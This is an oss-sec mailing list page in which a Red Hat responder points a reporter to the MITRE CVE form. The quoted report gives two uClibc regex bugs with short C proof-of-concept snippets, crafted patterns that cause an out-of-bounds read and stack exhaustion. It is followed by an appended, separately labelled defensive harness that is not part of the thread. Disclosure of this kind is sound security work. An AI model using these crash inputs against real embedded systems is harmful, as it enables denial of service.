oss-sec mailing list archives
Re: two vulns in uClibc-0.9.33.2
From: Andrej Nemec <anemec () redhat com>
Date: Fri, 16 Jun 2017 08:15:59 +0200
Hello,

Unfortunately, CVE assignments are not done through this list anymore. You need to visit [1] and request the CVEs by filling out the form. Could you please look at it and let the list know about the assigned CVEs?

Thanks!

[1] https://cveform.mitre.org/

Best Regards,

--
Andrej Nemec, Red Hat Product Security
3701 3214 E472 A9C3 EFBE 8A63 8904 44A1 D57B 6DDA

On 06/16/2017 05:53 AM, fefe wrote:
> I found two vulns in uClibc-0.9.33.2 (https://uclibc.org/).
>
> One is about line 2682 of get_subexp.c:
>
>     if (BE (bkref_str_off >= mctx->input.valid_len, 0))
>       {
>         /* If we are at the end of the input, we cannot match.  */
>         if (bkref_str_off >= mctx->input.len)
>           break;
>
>         err = extend_buffers (mctx);
>         if (BE (err != REG_NOERROR, 0))
>           return err;
>
>         buf = (const char *) re_string_get_buffer (&mctx->input);
>       }
>
>     if (buf [bkref_str_off++] != buf[sl_str - 1])
>       break; /* We don't need to search this sub expression ... */
>
> With "bkref_str_off >= mctx->input.valid_len", when bkref_str_off == mctx->input.valid_len, the "buf [bkref_str_off++] != buf[sl_str - 1]" case causes a one-bit out-of-bounds read.
>
> The PoC code is like:
>
>     if (regcomp (&regtmp, "(.+)upper\\1^", REG_EXTENDED | REG_ICASE | REG_NOSUB) == 0)
>       {
>         regmatch_t pmatch[1];
>         regexec (&regtmp, "upperupperupperx", 1, pmatch, 0);
>         regfree (&regtmp);
>       }
>
> The other is about line 1837 of regexec.c:
>
>     check_dst_limits_calc_pos_1 (const re_match_context_t *mctx, int boundaries,
>                                  int subexp_idx, int from_node, int bkref_idx)
>     .......
>         cpos = check_dst_limits_calc_pos_1 (mctx, boundaries, subexp_idx, dst, bkref_idx);
>
> The recursive calls of check_dst_limits_calc_pos_1 cause a DDOS because of stack exhaustion.
>
> The PoC code is like:
>
>     if (regcomp (&regtmp, "\x28\x2E\x3F\x3F\x28\x2E\x3F\x29\x5C\x42\x44\x3F\x3F\x28\x2E\x5C\x32\x29\x2A\x5C\x32\x28\x2E\x3F\x29\x5C\x32\x29\x2A\x5C\x32\xBD", REG_EXTENDED | REG_ICASE | REG_NOSUB) == 0)
>       {
>         regmatch_t pmatch[1];
>         regexec (&regtmp, "\x72\xFF\xFF\xFF\xFF\xBD", 1, pmatch, 0);
>         regfree (&regtmp);
>       }
>
> A large number of embedded devices use uClibc instead of glibc. Could you assign CVE IDs for those?
>
> Thank you
>
> Benjin Liu
> Codesafe Team of Qihoo 360
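Added example (not from the report or from uClibc; the function and enum names are assumed): a small C harness that compiles and matches an untrusted pattern inside a forked child with a capped stack and an alarm, so that a matcher fault such as the out-of-bounds read or the stack exhaustion described above ends the child and is reported to the caller instead of taking down the whole process.

```c
#define _GNU_SOURCE
#include <regex.h>
#include <signal.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>

/* Outcome of a guarded match (assumed names, not part of any libc). */
enum guarded_result {
    GR_MATCH, GR_NOMATCH, GR_COMPILE_ERROR, GR_CRASHED, GR_TIMEOUT, GR_FORK_ERROR
};

/* Compile and match an untrusted pattern in a forked child whose stack is
 * capped at stack_bytes and which is killed after timeout_sec seconds.
 * A crash inside the matcher (e.g. an out-of-bounds read) or runaway
 * recursion that exhausts the stack then terminates only the child, and
 * the parent turns that into a result code rather than dying itself.
 * The regcomp flags mirror the ones used in the report above. */
enum guarded_result guarded_regexec(const char *pattern, const char *subject,
                                    rlim_t stack_bytes, unsigned timeout_sec)
{
    pid_t pid = fork();
    if (pid < 0)
        return GR_FORK_ERROR;

    if (pid == 0) {
        /* Child: tighten limits first, then touch the regex engine. */
        struct rlimit rl = { stack_bytes, stack_bytes };
        setrlimit(RLIMIT_STACK, &rl);  /* best effort; caps further growth */
        alarm(timeout_sec);            /* SIGALRM ends a runaway match */

        regex_t re;
        if (regcomp(&re, pattern, REG_EXTENDED | REG_ICASE | REG_NOSUB) != 0)
            _exit(GR_COMPILE_ERROR);
        int rc = regexec(&re, subject, 0, NULL, 0);
        regfree(&re);
        _exit(rc == 0 ? GR_MATCH : GR_NOMATCH);
    }

    /* Parent: classify how the child ended. */
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return GR_FORK_ERROR;
    if (WIFEXITED(status))
        return (enum guarded_result) WEXITSTATUS(status);
    if (WIFSIGNALED(status) && WTERMSIG(status) == SIGALRM)
        return GR_TIMEOUT;
    return GR_CRASHED;  /* SIGSEGV, SIGBUS, SIGABRT, ... */
}
```

On a libc with the reported defects, the two PoC patterns above would come back as GR_CRASHED or GR_TIMEOUT from this wrapper while the caller keeps running.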
Current thread:
- two vulns in uClibc-0.9.33.2 fefe (Jun 15)
- Re: two vulns in uClibc-0.9.33.2 Andrej Nemec (Jun 15)
- Re: two vulns in uClibc-0.9.33.2 Zach W (Jun 16)
- Re: two vulns in uClibc-0.9.33.2 Peter Korsgaard (Jun 16)
- Re: two vulns in uClibc-0.9.33.2 Seth Arnold (Jun 16)
- Re: two vulns in uClibc-0.9.33.2 Kurt Seifried (Jun 16)
- Re: two vulns in uClibc-0.9.33.2 Michal Zalewski (Jun 16)
- Re: two vulns in uClibc-0.9.33.2 Bob Friesenhahn (Jun 16)
- Re: two vulns in uClibc-0.9.33.2 Florian Weimer (Jun 17)
- Re: two vulns in uClibc-0.9.33.2 Michal Zalewski (Jun 17)
- Re: two vulns in uClibc-0.9.33.2 Simon McVittie (Jun 17)
- Re: two vulns in uClibc-0.9.33.2 Jakub Wilk (Jun 17)